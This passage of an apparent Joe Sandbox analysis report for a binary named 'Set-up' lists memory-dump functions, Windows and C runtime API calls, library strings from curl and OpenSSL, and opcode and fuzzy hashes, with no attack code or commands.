                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: fputc
                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 1992160199-2555271450
                                    • Opcode ID: 8736861a852d6a3ba8b2f93125fb0ca5562358091fbc6c523ae914423c178534
                                    • Instruction ID: ab2766e1937baca90d9c9981a142912388dadd11546845b9fdd86c20e4654251
                                    • Opcode Fuzzy Hash: 8736861a852d6a3ba8b2f93125fb0ca5562358091fbc6c523ae914423c178534
                                    • Instruction Fuzzy Hash: AF82B071A083019FD714EE29C88476BB7E1AFC5728F148A3DF9A997291D330DD46CB46
                                    APIs
                                      • Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00C952A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQueryfflush
                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                    • API String ID: 1125614567-122532811
                                    • Opcode ID: 1d9fb2c9a3a774eee41226d614c6b0656a63e192a89c82c594e061e761b2d1b5
                                    • Instruction ID: 8cc1f7bd519d16c7591a9cba5121de5ff4bd482ea5b7deefde0385b8ae10b5bf
                                    • Opcode Fuzzy Hash: 1d9fb2c9a3a774eee41226d614c6b0656a63e192a89c82c594e061e761b2d1b5
                                    • Instruction Fuzzy Hash: 3A42F671B08701AFD708DE28CC85FABB6E6EBC4704F048A2CF59D97291D775AD058B92
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00F10374
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00F10395
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 00F1049D
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 00F104E7
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 00F1055F
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 00F1057A
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00F10618
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 00F106E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                                    • API String ID: 1297977491-3776850024
                                    • Opcode ID: 914aa924886dfab40ba40e6a2bf941e825ee868680c63381e791e473f01e8b0a
                                    • Instruction ID: b361163959a9cf4e80e8d50572b9aee582b9775232a4dfcf679aca3d45cf7f14
                                    • Opcode Fuzzy Hash: 914aa924886dfab40ba40e6a2bf941e825ee868680c63381e791e473f01e8b0a
                                    • Instruction Fuzzy Hash: 0F5291719087818BD711CF29D845BEBB7E4BFD9354F048A2DF8C892242EB749984DB92
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00E5E28D
                                    • FindNextFileW.KERNEL32(?,00000000), ref: 00E5E2BB
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 00E5E30A
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E5E3C7
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E5E3DD
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 00E5E3F8
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 00E5E41A
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00E5E44E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00E5E563
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00E5E571
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                                    • String ID:
                                    • API String ID: 1393009926-0
                                    • Opcode ID: 20694358cf2936a45aa9325efd55b5193be9513571b04b8f7a539b3f10e3160c
                                    • Instruction ID: 27c588939d6f29ce04fe0cf4653b88a41666371df6acaf76f148eb551784d86f
                                    • Opcode Fuzzy Hash: 20694358cf2936a45aa9325efd55b5193be9513571b04b8f7a539b3f10e3160c
                                    • Instruction Fuzzy Hash: 89912875600B029FD3258F38CC44B767BA9FF85316F188A69E8559B3E1E730EA54CB50
                                    APIs
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00D3CC95
                                      • Part of subcall function 00D3CDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00D3CEC8
                                      • Part of subcall function 00D3CDF0: SetLastError.KERNEL32(00000002,00000000,00D3CC27,00000004), ref: 00D3D109
                                    • SetLastError.KERNEL32(00000002), ref: 00D3CDD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLastmemchr
                                    • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                    • API String ID: 2208448350-3285806060
                                    • Opcode ID: 7b3aab661765f4a0bbd721156e54e11f494fb3adbafa24777a4017c58e5cf6b6
                                    • Instruction ID: e25220adaa281a7168ea3c855f05dfcc66a958559b54f627e3c7c130eb5376d9
                                    • Opcode Fuzzy Hash: 7b3aab661765f4a0bbd721156e54e11f494fb3adbafa24777a4017c58e5cf6b6
                                    • Instruction Fuzzy Hash: 5FD14B72A183018BD724DF28D84137AB7D1AF91304F19AA3DF8D9A7281EB74DD44D762
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
                                    • API String ID: 0-2568808753
                                    • Opcode ID: f1e858c23308c274724ed2a0e183b4a47fd245a23d1b30bc4d5c2653ec09bc31
                                    • Instruction ID: 3aebfd4509bd11fdb537b42a78d0963780a67e12600c9d360b7573d099fe39bc
                                    • Opcode Fuzzy Hash: f1e858c23308c274724ed2a0e183b4a47fd245a23d1b30bc4d5c2653ec09bc31
                                    • Instruction Fuzzy Hash: C3E1C671508309AFD7209F58EC85B3FB7E5EF84744F06882CFB8957252E671E9409BA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 0-2555271450
                                    • Opcode ID: 1985f32dc4830d59b41cd977a2abd52551f7e2d2e6ee4da695cfd04944e72306
                                    • Instruction ID: aaf057b52d21c26f47def09b8bc855bae71f81fb18b77136038715c570aa0818
                                    • Opcode Fuzzy Hash: 1985f32dc4830d59b41cd977a2abd52551f7e2d2e6ee4da695cfd04944e72306
                                    • Instruction Fuzzy Hash: 00C29D316087418FD718DF29C49076AB7E2FFC9318F198A2DE8A99B351D730ED458B86
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00FF06A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: $
                                    • API String ID: 3510742995-227171996
                                    • Opcode ID: f94c6c8a8c873a807aedce7aee3eabc19879f21e64807233c14e5bbeb7498954
                                    • Instruction ID: 1a5b3740dcca461b355f2c5320b8fcc37921ed3c99be5cadadcb4e494adb00bb
                                    • Opcode Fuzzy Hash: f94c6c8a8c873a807aedce7aee3eabc19879f21e64807233c14e5bbeb7498954
                                    • Instruction Fuzzy Hash: BFD2A3729087598FC724CF28C88066AF7E1FFC4714F198A2DE99997362D770E845DB82
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00EC8A66
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00EC8A88
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00EC8B45
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00EC8B59
                                    Strings
                                    • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00EC8A42, 00EC8F13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                                    • API String ID: 1297977491-3184136495
                                    • Opcode ID: e48eb5766788e8f7b103a1bb49eb51131a5937ab0977b8eebbd48f16e51de9a8
                                    • Instruction ID: ea506bef8f3f0a3ae713534ea24c9bafd9f2d279ea63ea24716eeac4d7e86bda
                                    • Opcode Fuzzy Hash: e48eb5766788e8f7b103a1bb49eb51131a5937ab0977b8eebbd48f16e51de9a8
                                    • Instruction Fuzzy Hash: 3A22F3725087419FD711CF24CA81BABB7E4FF96348F048A2DF895A7242DB31E945CB52
                                    APIs
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 010047A3
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 010047C1
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 01004800
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01004D16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _strdupmemcpystrchrstrlen
                                    • String ID: H$xn--
                                    • API String ID: 1602650251-4022323365
                                    • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                    • Instruction ID: b36e070e392d6b2d301e54b4e88ff4a701667722a1bce83fd45da024aa105090
                                    • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                    • Instruction Fuzzy Hash: AAE13771A087158BE71ADE2CD8C072EB7D2ABC4210F198A7EDBD6C73C1D7749845874A
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00F8C090
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 00F8C0BE
                                    Strings
                                    • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 00F8C433
                                    • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 00F8C0D2, 00F8C266
                                    • crypto/evp/encode.c, xrefs: 00F8C42E
                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00F8C0CD, 00F8C26B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                                    • API String ID: 3510742995-2458911571
                                    • Opcode ID: 550abe994eea040d8004353e48ab965c8f3ff001ddacce9afb1fcb5c49f9dd44
                                    • Instruction ID: 4192353f90713dbad772ec844beacafc6e9dece71b8d9f66d5a197f8fa37f8d2
                                    • Opcode Fuzzy Hash: 550abe994eea040d8004353e48ab965c8f3ff001ddacce9afb1fcb5c49f9dd44
                                    • Instruction Fuzzy Hash: E3C13B7160C3958FC711DF28C49076ABBE1AF95314F098A9DF8D58B382D234DD05DBA2
                                    Strings
                                    Memory Dump Source
